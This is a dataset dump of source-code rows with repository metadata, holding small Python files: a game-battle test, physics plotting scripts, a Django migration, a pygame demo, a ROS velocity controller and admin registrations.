blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5f65068b340764574dbfebbc61828c9b7fe411d7 | 2f4437893e1a9ecf0a2e380eab5b552c889bde8d | /app/tests/basic/inf1_inf2.py | fa28705313151c3b2ed84d34042a7b145d95fe41 | [
"MIT"
] | permissive | EBaalhuis/TI4_battle_sim | 85e9eae97240ce49ceda74c7b56482ec4308ff3f | c139ca71d98f320f780cbfc6297d5d1d1ad08a0b | refs/heads/main | 2023-03-24T13:17:12.036201 | 2021-03-25T21:11:43 | 2021-03-25T21:11:43 | 328,025,930 | 4 | 2 | MIT | 2021-03-25T16:57:13 | 2021-01-08T22:27:08 | Python | UTF-8 | Python | false | false | 600 | py | import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '../../..'))
import app.calculator.calculator as calc
from app import testing_helpers
# Regression test: 1 infantry attacking 2 infantry in ground combat.
# Pulls default combatants/options from the shared test helpers, runs the
# calculator, and checks the outcome percentages against an external reference.
attacker, defender, options, tol = testing_helpers.defaults()
# target source: http://alphamou.se/ti4calc/
target = [4, 9, 87] # target percentages; [tie, attacker, defender]
print("1 Infantry vs 2 Infantry")
# Units
attacker["infantry"] = 1
defender["infantry"] = 2
# Factions
# Ground Combat
options["ground_combat"] = True
# Options
# Run the simulation and compare the outcome distribution with `target`
# within tolerance `tol` (helper raises/reports on mismatch).
outcomes = calc.calculate(attacker, defender, options)
testing_helpers.evaluate(outcomes, target, tol)
| [
"ebbaalhuis@gmail.com"
] | ebbaalhuis@gmail.com |
a7f37d7825f23e51b5abe2fd578e1945767f3fea | 835a938c2adce722dc7130aa8d1ea56576a4e443 | /subfig.py | 08aad91746cadade3ead7316dde7332c8395b459 | [] | no_license | pdicerbo/destr | cd5af011ce1fd95484cf08250c764e294fe24087 | e7580ce71af8bc2d5d4f76a0ffc78e5ae9b197a0 | refs/heads/master | 2021-01-18T07:55:40.151670 | 2015-02-20T15:10:29 | 2015-02-20T15:10:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,051 | py | import numpy as np
import os
import string
from bisect import bisect_left # for BilinearInterpolation
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import colorsys
#from matplotlib import rc
# Filenames of the two precomputed lookup tables ("Umberto's matrices").
matrix_Logdelta_LogT_H2 = 'matrix_modif_Logdelta_LogT_H2.dat'
matrix_Logdelta_LogT_H2_tcool = 'matrix_modif_Logdelta_LogT_tcool.dat'
# Input/output directories used by the plotting routines below.
#path_out = '/scratch2/dicerbo/destr/time1e5/first/'
path_out = '/scratch2/dicerbo/destr/third/'
path_plot = '/scratch2/dicerbo/destr/exit/time1e5/first/'
path_exit = '/scratch2/dicerbo/destr/exit/compare/'
path_two = '/scratch2/dicerbo/plot_path/very_def/'
# global arrays: Temperature, H2OverDensity, H2Fraction, tcool to load UM's tables
# T in K, tcool in Gyr
# These are filled in by LoadMatrix() and read by plot_def().
T = None # dimension 1x50
Dens = None # dimension 1x50
FH2 = None # dimension 50x50
t_cool = None # dimension 50x50
def main():
    """Entry point: compare 'destr' vs 'full' runs (init_plot is disabled)."""
    comparison()
    #init_plot()
def comparison():
    """
    Plot the H2-fraction time evolution from two runs ('destr' under
    path_out, 'full' under path_two) for temperature directory T700,
    saving one comparison JPEG per pressure file under path_exit.

    Returns 1. if the input directory is missing, otherwise None.
    """
    print '\n\tWithin comparison function\n'
    # Temperature tag is hard-coded; the interactive prompt is disabled.
    #tmp = str(raw_input("\n\tEnter initial temperature of gas [Gyr] :> "))
    tmp = '700'
    dir1 = path_out+'T'+tmp+'/'
    if not os.path.exists(dir1):
        print '\tError: directory ' + dir1 + 'doesent exist!\n\tExit'
        return 1.
    dir2 = path_two+'T'+tmp+'/'
    pathx = path_exit+'T'+tmp+'/'
    # Make sure the output directory exists.
    if os.path.exists(pathx):
        print '\n\tpath %s exist!'%(pathx)
    else:
        print '\n\tmaking directory'
        os.makedirs(pathx)
        print '\t%s created successfully'%(pathx)
    files = os.listdir(dir1)
    nametp = []
    # Keep only non-'press' files with more than 3 data rows.
    for name in files:
        if string.count(name, 'press') == 0:
            matrix = np.loadtxt(dir1+name, comments = '#')
            if len(matrix) > 3.:
                nametp.append(name)
                print '\tfile %s listed' % (name)
            else:
                print '\tfile %s skipped' % (name)
    #namedef = nametp[(len(nametp) - 7)]
    for namedef in nametp:
        print '\tPlotting ' + namedef + ' file!'
        # Same filename is expected to exist in both run directories.
        mat1 = np.loadtxt(dir1+namedef, comments = '#')
        print '\tMatrix from ' + dir1+namedef + ' loaded; len: %g' % (len(mat1))
        mat2 = np.loadtxt(dir2+namedef, comments = '#')
        print '\tMatrix from ' + dir2+namedef + ' loaded; len: %g' % (len(mat2))
        #data to plot: column 0 is time, column 3 is the H2 fraction
        time1 = mat1[:,0]
        f1 = mat1[:, 3]
        time2 = mat2[:,0]
        f2 = mat2[:, 3]
        # Replace t=0 with 1 so log10 is finite (log10(1) == 0).
        time1[time1 == 0.] = 1.
        time1 = np.log10(time1)
        time2[time2 == 0.] = 1.
        time2 = np.log10(time2)
        plt.figure()
        plt.plot(time1, f1, 'k.', label = 'destr')
        plt.plot(time2, f2, 'r-', label = 'full')
        ax = plt.gca()
        plt.legend(loc = 2)
        ax.set_xlabel('time (log t)')
        ax.set_ylabel('H2 Fraction')
        ax.set_title('H2 Fraction Evolution')
        # Output name embeds the pressure tag taken from the filename tail.
        newname = pathx + 'comparisonLog10P' + namedef[-8:-4] + '.jpg'
        plt.savefig(newname)
        plt.close('all')
        print '\n\t'+newname[len(pathx):]+' done\n'
    print '\n\tFinally end\n'
def init_plot():
    """
    Create the plot output directory if needed, then run plot_def()
    on every temperature directory (contains 'T', no 'l') under path_out.
    """
    if os.path.exists(path_plot):
        print '\n\tpath %s exist!'%(path_plot)
    else:
        print '\n\tmaking directory'
        os.makedirs(path_plot)
        print '\t%s created successfully'%(path_plot)
    dirs = os.listdir(path_out)
    dirs.sort();
    for d in dirs:
        # select directories like 'T700' while excluding names containing 'l'
        if string.count(d, 'l') == 0 and string.count(d, 'T') == 1:
            print '\n\tStart working on '+ d
            #adjust(path_out, d)
            plot_def(d)
            print '\n\tEnd working on ' + d
    print '\n\tFinally End\n'
def plot_def(directory):
    """
    Build a two-panel figure for one temperature directory:
    top panel: cooling-time contour map (from the global t_cool table)
    with the evolution paths of each pressure run overplotted;
    bottom panel: the Blitz & Rosolowsky comparison curves.
    The figure is saved as path_plot/path_<directory>.jpg.
    """
    print '\n\tWithin plot function\n'
    #Load tcool matrix
    LoadMatrix(filename=matrix_Logdelta_LogT_H2_tcool)
    global T ; global Dens ; global FH2; global t_cool
    # NOTE: tcool aliases (does not copy) the global array, so the
    # in-place clipping below mutates t_cool as well.
    tcool = t_cool
    tcool[tcool > 0.] = np.log10(tcool[tcool > 0.])
    v_min = -5
    v_max = 7.
    # clip to the colorbar range; zeros and values below v_min are
    # pushed to v_max (saturated)
    tcool[tcool == 0.] = v_min
    tcool[tcool > v_max] = v_max
    tcool[tcool <= v_min] = v_max
    '''
    H2 = FH2
    H2[H2 > 0.] = np.log10(H2[H2 > 0.])
    v_min = -6
    v_max = -2.
    H2[H2 == 0.] = v_min
    H2[H2 > v_max] = v_max
    H2[H2 < v_min] = v_min
    '''
    # evenly spaced contour levels between v_min and v_max
    numlev = 15
    dmag0 = (v_max - v_min) / float(numlev)
    levels0 = np.arange(numlev) * dmag0 + v_min
    #path's plot
    files = os.listdir(path_out+directory)
    files.sort()
    fls = files[:]
    press = np.zeros(len(files), dtype = float)
    j = 0
    # Split listing into 'time' files (one per pressure, tag parsed from
    # the filename tail) and the single Blitz&Rosolowsky data file.
    for name in files:
        if string.count(name, 'time') != 0:
            fls[j] = directory+'/'+name
            press[j] = float(name[(len(name)-8):-4])
            j += 1
        else:
            # NOTE(review): 'br' is only bound if a non-'time' file exists;
            # otherwise np.loadtxt(br) below would raise NameError — confirm
            # every directory contains the B&R file.
            br = path_out + directory + '/' + name
            print "\n\tFile " + name + " is for Blitz&Rosolowsky's plot -> Continue\n"
    # trim the unused tail slots if some files were not 'time' files
    if j == len(files):
        filedef = fls[:]
        pdef = press[:]
    else:
        filedef = fls[:(j-len(files))]
        pdef = press[:(j-len(files))]
    pmax = pdef.max()
    pmin = pdef.min()
    # map each pressure onto a hue in [0, 250] degrees -> RGB color
    h = np.zeros(pdef.size, dtype = float)
    ind = 0
    for p in pdef:
        h[ind] = ((p-pmin) / (pmax-pmin))*250.
        ind += 1
    cdef = [colorsys.hsv_to_rgb(x/360., 1., 1.) for x in h]
    #plots
    fig = plt.figure(figsize=(18,16))
    figura = fig.add_subplot(2, 1, 1, adjustable='box', aspect = 1.1)
    plt.title('Paths in Phase Diagram\n', fontsize = 28)
    #figura = plt.contourf(Dens,T,H2,levels0,extend='both', cmap = cm.hot)
    figura = plt.contourf(Dens,T,tcool,levels0,extend='both', cmap = cm.hot_r)
    ax1 = plt.gca()
    ax1.set_xlim([Dens.min(), Dens.max()])
    ax1.set_ylim([1., 5.])
    for tick in ax1.xaxis.get_major_ticks():
        tick.label.set_fontsize(17)
    for tick in ax1.yaxis.get_major_ticks():
        tick.label.set_fontsize(17)
    cbar = plt.colorbar(figura,format='%3.1f', shrink=0.8)
    cbar.set_ticks(np.linspace(v_min,v_max,num=levels0.size,endpoint=True))
    #cbar.set_label('H$_{2}$ fraction',fontsize=20)
    cbar.set_label('$\log_{10}t_{cool} [Gyr]$',fontsize=25)
    print "\n\tUmberto's matrix plotted\n"
    # overplot one (rho, T) path per pressure file, colored by pressure
    k = 0
    for name in filedef:
        print '\tPlotting ' + name[(len(directory)+1):] + ' file'
        #figura = plt.plotfile(path_out+name, delimiter = '\t', cols=(1, 2), comments='#', color = cdef[k], marker='.',
        #mfc = cdef[k], mec = cdef[k], label = 'Log10P = '+str(pdef[k]), newfig=False)
        data = np.loadtxt(path_out+name, comments = '#'); data = data.T
        rho = data[1, :]; tmp = data[2, :]
        plt.plot(rho, tmp, color = cdef[k], marker='.', mfc = cdef[k], mec = cdef[k], label = 'Log10P = '+str(pdef[k]))
        k += 1
    lgd = plt.legend(bbox_to_anchor=(1.55, 0.5), loc=5, borderaxespad=1.)
    plt.xlabel('$\log_{10}\\rho [g/cm^3]$',fontsize=25) ; plt.ylabel('$\log_{10} T[k]$',fontsize=25)
    #Blitz&Rosolowsky plot (bottom panel)
    figura2 = fig.add_subplot(2, 1, 2, adjustable='box', aspect = 1.3)
    plt.title('Blitz & Rosolowsky\n', fontsize = 28)
    ax2 = plt.gca()
    newm = np.loadtxt(br, comments = '#'); newm = newm.T
    press = newm[0, :]
    br_ro = newm[3, :]
    fh2 = newm[4, :]
    ax2.set_xlim([3., 6.])
    ax2.set_ylim([0., 1.02])
    ax2.set_xlabel('$\log_{10} P/k_B [K/cm^3]$', fontsize = 25)
    ax2.set_ylabel('$f_{H2}$', fontsize = 25)
    plt.plot(press, br_ro, 'k-')
    plt.plot(press, fh2, 'b-')
    for tick in ax2.xaxis.get_major_ticks():
        tick.label.set_fontsize(17)
    for tick in ax2.yaxis.get_major_ticks():
        tick.label.set_fontsize(17)
    #scale figure2: shrink to 3/4 and shift right so it sits under panel 1
    scale = figura2.get_position().bounds
    newpos = [scale[0]*3./4. + 0.2, scale[1]*3./4., scale[2]*3./4., scale[3]*3./4.]
    figura2.set_position(newpos)
    newname = path_plot + 'path_' + directory + '.jpg'
    plt.savefig(newname, bbox_extra_artists=(lgd,), bbox_inches='tight')
    #plt.savefig(newname)
    plt.close('all')
    print '\n\t'+newname[len(path_plot):]+' done\n'
def LoadMatrix(filename=False):
    """
    Load one of Umberto's table files into the module-level globals.

    The first row of the file holds the overdensity edges (Dens) and the
    second the temperature edges (T); the remaining rows are the data
    matrix, stored into FH2 or t_cool depending on which of the two known
    tables was requested.  Nothing is returned: results are published via
    the globals Dens, T, FH2 and t_cool.

    Parameters
    ----------
    filename : str
        Path to one of the two known tables (matrix_Logdelta_LogT_H2 or
        matrix_Logdelta_LogT_H2_tcool).  The default False is a sentinel
        kept for backward compatibility; it triggers an IOError.

    Raises
    ------
    IOError
        If no filename is given, the file does not exist on disk, or the
        filename is not one of the two recognised tables.
    """
    global matrix_Logdelta_LogT_H2
    global matrix_Logdelta_LogT_H2_tcool
    # identity test on the sentinel instead of '==' so valid falsy paths
    # (unlikely but possible) are not rejected by accident
    if filename is False:
        raise IOError('\n\t filename MUST be provided\n')
    # store the path of this module
    # locate = inspect.getfile(LoadMatrix)
    # dir_file = locate.replace('H2fraction.py','')
    # filename = dir_file+filename
    if not os.path.isfile(filename):
        # format into a single message string; the original passed a tuple
        # of three arguments, producing a garbled error message
        raise IOError('\n\t filename %s NOT found\n' % filename)
    # load file, skipping commented lines
    matrix = np.loadtxt(filename, comments='#')
    global Dens ; global T ; global FH2 ; global t_cool
    # OverDensity edges
    Dens = matrix[0, :]
    # Temperature edges
    T = matrix[1, :]
    # dispatch the data rows to the global matching the requested table
    if filename == matrix_Logdelta_LogT_H2:
        FH2 = matrix[2:, :]
    elif filename == matrix_Logdelta_LogT_H2_tcool:
        t_cool = matrix[2:, :]
    else:
        raise IOError('\n\t It seems that %s does not exist\n' % filename)
# Entry point: the script runs its comparison plots immediately on import.
main()
| [
"dicerbo@lapoderosa.oats.inaf.it"
] | dicerbo@lapoderosa.oats.inaf.it |
fa27bce37bd4a31c0734171d2f4b56a9949bad56 | d52413173437ba73ecdf822ca895e659f00a8ce7 | /kiwibackend/application/module/artifact/migrations/0003_auto_20151209_1606.py | 66ae6b692b0125f17dbbc5170a7fce62dbc9ac44 | [] | no_license | whiteprism/mywork | 2329b3459c967c079d6185c5acabd6df80cab8ea | a8e568e89744ca7acbc59e4744aff2a0756d7252 | refs/heads/master | 2021-01-21T11:15:49.090408 | 2017-03-31T03:28:13 | 2017-03-31T03:28:13 | 83,540,646 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 946 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add three CharField columns to the 'artifact' model."""

    dependencies = [
        ('artifact', '0002_auto_20150914_0908'),
    ]
    operations = [
        migrations.AddField(
            model_name='artifact',
            name='heroTypeList_int',
            # verbose_name decodes to Chinese for "type of the hero equipping it"
            field=models.CharField(default=b'', max_length=200, verbose_name='\u88c5\u5907\u7684\u82f1\u96c4\u7684\u7c7b\u578b'),
        ),
        migrations.AddField(
            model_name='artifact',
            name='searchDifficuty_int',
            # verbose_name decodes to Chinese for "drop-stage difficulty"
            field=models.CharField(default=b'', max_length=200, verbose_name='\u6389\u843d\u5173\u5361\u96be\u5ea6'),
        ),
        migrations.AddField(
            model_name='artifact',
            name='searchInstances_int',
            # verbose_name decodes to Chinese for "drop stages"
            field=models.CharField(default=b'', max_length=200, verbose_name='\u6389\u843d\u5173\u5361'),
        ),
    ]
| [
"snoster@163.com"
] | snoster@163.com |
18435b988db2adb2d750faf0e9145a409d01aff3 | daa464da92a33a10ae6ead5bbd51b1e63fcbddfb | /miniProject/main/plot.py | 868fb4192f3b648e2b65f3dc3ce9052438e2825c | [] | no_license | lzddzh/cs5234 | 53234e4c1a61b1af01a0caa77253a16aed573bda | d07bcdf8517dd9403cfe582d01be751b444c9ea2 | refs/heads/master | 2020-05-29T08:49:57.118957 | 2017-02-11T13:18:59 | 2017-02-11T13:18:59 | 69,001,785 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | f = open("The Monkey's Paw.txt")
# Build a normalized frequency distribution (17 bins, values 0-16) from the
# whitespace-separated integers in the input file opened above as `f`.
content = f.read()
lines = content.strip().split();
num = [int(x) for x in lines]
array = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
# count occurrences of each value (assumes every value is in 0..16)
for each in num:
    array[each] += 1
# total count, then normalize each bin to a fraction of the total
s = 0
for each in array:
    s += each
for i in range(0, len(array)):
    array[i] = (array[i] + 0.0) / s
print s, array
| [
"7077804@qq.com"
] | 7077804@qq.com |
f24cb68aa5f6a89d1cf9f9d97a614e601f5bed0f | b83bd2709729ac2eb65026ba6e377d619371369a | /examples/move_mouse.py | 68532b2392f3324b465d53030f8bcac5a3564b4a | [] | no_license | main1015/pygame-demo | cbc36a1066497346a14c016c5904106740ef0aac | a6bebfdc7f21ec675f29155f039d410431785050 | refs/heads/master | 2021-01-22T05:05:20.932704 | 2013-07-04T09:37:05 | 2013-07-04T09:37:05 | 11,117,996 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,686 | py | # -*- coding: utf-8 -*-
__author__ = 'Administrator'
# Sample Python/Pygame Programs
# Simpson College Computer Science
# http://cs.simpson.edu
'''
使用鼠标移动一个图形
'''
import pygame
# Define some colors
# RGB color tuples used by the drawing helpers below.
black = ( 0, 0, 0)
white = ( 255, 255, 255)
blue = ( 50, 50, 255)
green = ( 0, 255, 0)
dkgreen = ( 0, 100, 0)
red = ( 255, 0, 0)
purple = (0xBF,0x0F,0xB5)
brown = (0x55,0x33,0x00)
# Function to draw the background
def draw_background(screen):
    """Fill the whole surface with white, erasing the previous frame."""
    # Set the screen background
    screen.fill(white)
def draw_item(screen,x,y):
    """Draw the item at (x, y): a 30x10 green bar with a black dot centered on it."""
    pygame.draw.rect(screen,green,[0+x,0+y,30,10],0)
    pygame.draw.circle(screen,black,[15+x,5+y],7,0)
pygame.init()
# Set the height and width of the screen
size=[700,500]
screen=pygame.display.set_mode(size)
# Initial position of our object
# NOTE(review): item_pos is never read afterwards — leftover from an
# earlier version of the example.
item_pos=-30
#Loop until the user clicks the close button.
done=False
# Used to manage how fast the screen updates
clock=pygame.time.Clock()
# Main event loop: redraw the item at the mouse position each frame.
while done==False:
    for event in pygame.event.get(): # User did something
        if event.type == pygame.QUIT: # If user clicked close
            done=True # Flag that we are done so we exit this loop
    draw_background(screen)
    # Get the current mouse position. This returns the position
    # as a list of two numbers.
    pos = pygame.mouse.get_pos()
    # Fetch the x and y out of the list, just like we'd fetch letters out of a string.
    x=pos[0]
    y=pos[1]
    # Draw the item where the mouse is.
    draw_item(screen,x,y)
    # Go ahead and update the screen with what we've drawn.
    pygame.display.flip()
    # Limit to 20 frames per second
    clock.tick(20)
pygame.quit () | [
"446740010@qq.com"
] | 446740010@qq.com |
9a48e22f8eaa6712d2b8bb9c83b468a5f54e3fc2 | 249dfff2a8f1f2b0df042baf7eadb1147f641daa | /task2.py | e4aec93d7e449c33b7f8333687c24b2ef06b9fe5 | [] | no_license | sheilatruong96/portalInterview | dd71a97430113e83a8c907670af547fe53e0ae83 | 0358ca7efb635f0f82911bf1702cf039fe29b3fc | refs/heads/master | 2021-08-15T15:13:43.871423 | 2017-11-17T22:17:24 | 2017-11-17T22:17:24 | 111,150,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | from datetime import datetime
##create data structure that contains/represents all the information
## Each entry is "<event name>: <date> <start> - <end>".
events = ["Interview at the Portal: Feb 23 2017 3:00PM - 4:30PM",
"Lunch with Cindy: Feb 25 2017 12:00PM - 1:00PM",
"Dinner with John: Feb 24 2017 5:00PM - 5:30PM",
"Conference: Feb 24 2017 11:00AM - 4:30PM"]
eventDict = dict()
# split on the first ": " only, so event names may not contain ": "
for eachEvent in events:
    eventandDatetime = eachEvent.split(": ",1)
    eventDict[eventandDatetime[0]] = eventandDatetime[1]
##Add 4 more vents to dataset making sure 2 added events overlap
eventDict["Morning job"] = 'Nov 1 2017 12:00PM - 3:00PM'
eventDict["Dinner with family"] = 'Nov 1 2017 10:00AM - 1:00PM'
eventDict["Study for midterm"] = 'Feb 25 2017 1:00PM - 3:00PM'
eventDict["Project Presentation"] = 'Nov 2 2017 12:00PM - 3:00PM'
##Develop algorithm to find overlapping events
##remake specific dictionary: name -> {date: (start_time, end_time)}
for event in eventDict:
    splitPart = eventDict[event].split("-")
    firstPart = splitPart[0].strip()
    secPart = splitPart[1].strip()
    eventDate = datetime.strptime(firstPart,'%b %d %Y %I:%M%p').date()
    eventStartTime = datetime.strptime(firstPart,'%b %d %Y %I:%M%p').time()
    # the end part carries only a clock time, no date
    eventEndTime = datetime.strptime(secPart,'%I:%M%p').time()
    eventDict[event] = dict()
    eventDict[event][eventDate] = (eventStartTime, eventEndTime)
dateConflict = dict()
##check for date conflict: group event names by calendar date
for item in eventDict:
    for d in eventDict[item]:
        if d not in dateConflict:
            dateConflict[d] = [item]
        else:
            dateConflict[d].append(item)
##check for time conflict
# NOTE(review): this loop only extracts start/end of each same-day event;
# the actual interval-overlap comparison is never performed, so no time
# conflicts are reported — the algorithm looks unfinished.
start = 0
end = 0
for eachDate in dateConflict:
    if len(dateConflict[eachDate]) > 1:
        for eachEvent in dateConflict[eachDate]:
            start = eventDict[eachEvent][eachDate][0]
            end = eventDict[eachEvent][eachDate][1]
| [
"noreply@github.com"
] | sheilatruong96.noreply@github.com |
088237f546d90336685ac5b4adec442668b908d9 | 1349b8d3077b84bf7f21d437c32f72c3d471cee6 | /src/controller.py | 797b0b29781d3a54c8bcaa48b416297831f964cc | [] | no_license | gustavollps/youbot | 6d95c446db3a3701acd999b7adabf37cf8b107c8 | c364ce1bd322e030ec74b8cb44c311f97dca3717 | refs/heads/master | 2020-09-17T04:27:03.928914 | 2019-11-28T21:14:42 | 2019-11-28T21:14:42 | 223,988,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,896 | py | import rospy
from geometry_msgs.msg import Twist
from utils import *
class Controller:
    """Velocity controller for a holonomic base driven via Twist messages.

    A PID loop regulates the heading (yaw); simple proportional control
    drives the base toward local/global targets.  Commands are published
    through the ``cmdvel_pub`` ROS publisher supplied at construction.
    """

    # PID gains for the heading loop
    kp = 0.4
    ki = 0.01
    kd = 0.5
    I = 0            # integral accumulator of the heading error
    error = 0        # latest heading error
    old_error = 0    # previous heading error, for the derivative term
    cmdvel_pub = None    # ROS publisher for geometry_msgs/Twist
    vellim = 0.8     # saturation limit applied to linear speeds in moveCmd
    move_kp = 1      # proportional position gain (normal mode)
    move_kp_fast = 2 # proportional position gain (fast mode)

    def __init__(self, cmdvel_pub):
        # cmdvel_pub: publisher the velocity commands are sent through
        self.cmdvel_pub = cmdvel_pub

    def setAngle(self, setpoint_angle, odom_angle):
        """Return the rotation command steering yaw (odom_angle[2]) to setpoint_angle.

        Within a +/-30 degree error band a PID law is applied; outside it
        the output saturates to a constant +/-0.5 turn rate.
        """
        # anti-windup: clamp the accumulated integral term
        self.I = constrain(self.I, 0.5)
        setpoint_angle = fix_angle(setpoint_angle, odom_angle[2])
        self.error = (setpoint_angle - odom_angle[2])
        threshold = 30 * math.pi / 180
        if abs(self.error) < threshold:
            P = self.kp * self.error
            # Bug fix: the integral used to be computed into a local variable
            # and never stored back, so self.I stayed 0 forever and the I
            # term was dead (stop() resetting self.I and the constrain above
            # show accumulation was intended).
            self.I = self.I + self.error * self.ki
            D = (self.error - self.old_error) * self.kd
            PID = P + self.I + D
            self.old_error = self.error
            # print(PID, error, angle, odom_angle[2])
            return PID
        else:
            # far from the setpoint: turn at a fixed rate toward it
            controller_val = 0.5
            if self.error < 0:
                return -controller_val
            elif self.error > 0:
                return controller_val

    def moveCmd(self, x, y, rot):
        """Publish a Twist; linear speeds are clipped to +/-vellim.

        NOTE(review): x is written to linear.y and y to linear.x — this
        axis swap looks like a deliberate convention of the platform;
        confirm against the base driver before changing it.
        """
        msg = Twist()
        x = constrain(x, self.vellim)
        y = constrain(y, self.vellim)
        msg.linear.x = y
        msg.linear.y = x
        msg.angular.z = rot
        self.cmdvel_pub.publish(msg)

    def moveLocal(self, x, y, odom):
        """Drive toward (x, y) proportionally to the position error, no rotation."""
        dx = x - odom.pose.pose.position.x
        dy = y - odom.pose.pose.position.y
        # minimum-speed floor; currently 0.0, so the clamps below are no-ops
        min_vel = 0.000
        if 0 < dx < min_vel:
            dx = min_vel
        elif -min_vel < dx < 0:
            dx = -min_vel
        if 0 < dy < min_vel:
            dy = min_vel
        elif -min_vel < dy < 0:
            dy = -min_vel
        # move_cmd(0, 0, rot)
        self.moveCmd(dx, dy, 0)

    def moveGlobal(self, point, ang, odom, fast):
        """Drive toward world-frame `point` while turning toward heading `ang`.

        `fast` selects the higher position gain and looser velocity limits;
        in normal mode translation is suppressed until the heading error is
        within 5 degrees.
        """
        x = point[0]
        y = point[1]
        if fast:
            kp_m = self.move_kp_fast
        else:
            kp_m = self.move_kp
        # proportional velocity in the world frame
        dx = (x - odom.pose.pose.position.x) * kp_m
        dy = (y - odom.pose.pose.position.y) * kp_m
        odom_angle = get_angle(odom)
        yaw = odom_angle[2]
        # rotate the velocity vector into the robot frame
        vel_ang = math.atan2(dy, dx)
        vel_mod = math.sqrt(dx ** 2 + dy ** 2)
        dang = vel_ang - yaw
        sy = math.sin(dang)
        cy = math.cos(dang)
        vx = vel_mod * cy
        vy = vel_mod * sy
        # heading command from the PID loop (sign flipped for this platform)
        rot = -self.setAngle(ang, odom_angle)
        vx = constrain(vx, 1)
        vy = constrain(vy, 1)
        ang = fix_angle(ang, yaw)
        if not fast:
            # rotate in place first: no translation until nearly aligned
            if abs(ang - yaw) > 5 * math.pi / 180:
                vx = vy = 0
            vx = constrain(vx, 1)
            vy = constrain(vy, 1)
            self.moveCmd(vx, vy, rot)
        else:
            vx = constrain(vx, 1.5)
            vy = constrain(vy, 1.5)
            self.moveCmd(vx, vy, rot)

    def stop(self):
        """Reset the integral term and command zero velocity."""
        self.I = 0
        self.moveCmd(0, 0, 0)
| [
"gustavollps@gmail.com"
] | gustavollps@gmail.com |
4a375ac9b82ae9d25d1b1f41d7dda93abbf0da48 | 08bf92d4ab2ae84b75ef71cc2fa09873a45015a4 | /app/venv/lib/python3.6/copy.py | 6c1d950706c13a1b7092a2c08ddd89250a8f9ce8 | [] | no_license | afeierman/listen-local | 2986e827f4d5400475520f8be1c6ac74b66f6b2b | 2d95419a6120e37665d3f2c3a22f37de25448f69 | refs/heads/master | 2021-01-22T06:36:51.247035 | 2018-03-27T19:55:46 | 2018-03-27T19:55:46 | 81,772,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py | /home/andrew/miniconda3/lib/python3.6/copy.py | [
"andrew.feierman@gmail.com"
] | andrew.feierman@gmail.com |
d701a9fdfa6f370314ed7cd6527b7b4e96d03442 | 24f4815ba8a325169ec2b3faa0ff26627368901c | /7.user input and while loops/7.2.4 break.py | a7e6a6f4fb8aa53b3fc01d652357afcef78539e8 | [] | no_license | gahakuzhang/PythonCrashCourse-LearningNotes | b57d9328fe978acdb344faa60ed255b953742aeb | d0c0ee7f85dbc276cb42312f5cdb023d3cbe35ae | refs/heads/master | 2021-09-01T21:17:52.775832 | 2017-12-28T17:05:03 | 2017-12-28T17:05:03 | 111,400,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | #7.2.4 using break to exit a loop
# A loop that starts with `while True` runs indefinitely until it hits break.
# `break` skips the rest of the loop body and exits the entire loop.
prompt="\nPlease enter the name of cities you have visited: "
prompt+="\n(Enter 'quit' when you are finished.) "
while True:
    city=input(prompt)
    # sentinel value ends the loop instead of being treated as a city
    if city=='quit':
        break
    else:
        print("I'd love to go to "+city.title()+"!")
| [
"noreply@github.com"
] | gahakuzhang.noreply@github.com |
d92da44aeec3f2cba4f058a3ea8914c7a10221aa | 198da4f1c3e9ab4880a7e84e5a208f080778f85d | /apps/organization/adminx.py | 557b8576e27746935b6b7d2802b4a324705f35e7 | [] | no_license | cdmonkey/MxOnline | 11645a9a72d0bd6980ed9eb295cc462774d06867 | 7380e1e5710e1f7b949299d413e786331d40f32c | refs/heads/master | 2020-03-27T17:10:20.409425 | 2018-08-30T06:05:33 | 2018-08-30T06:05:33 | 146,700,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | __author__ = 'cdmonkey'
__date__ = '2018/8/3 15:58'
import xadmin
from .models import City, CourseOrg, Teacher
class CityAdmin:
    """xadmin configuration for City: list columns, search and filter fields."""
    list_display = ["name", "desc", "add_time"]
    search_fields = ["name", "desc"]
    list_filter = ["name", "desc", "add_time"]
class CourseOrgAdmin:
    """xadmin configuration for CourseOrg: list columns, search and filter fields."""
    list_display = ["name", "desc", "category", "image", "address", "city", "add_time"]
    search_fields = ["name", "desc", "category", "address", "city"]
    list_filter = ["name", "desc", "category", "image", "address", "city", "add_time"]
class TeacherAdmin:
    """xadmin configuration for Teacher: list columns, search and filter fields."""
    list_display = ["name", "org", "work_years", "work_company", "work_position", "points", "add_time"]
    search_fields = ["name", "org", "work_years", "work_company", "work_position", "points"]
    list_filter = ["name", "org", "work_years", "work_company", "work_position", "points", "add_time"]
# Register each model with its admin configuration on the xadmin site.
xadmin.site.register(City, CityAdmin)
xadmin.site.register(CourseOrg, CourseOrgAdmin)
xadmin.site.register(Teacher, TeacherAdmin)
| [
"brucemx@qq.com"
] | brucemx@qq.com |
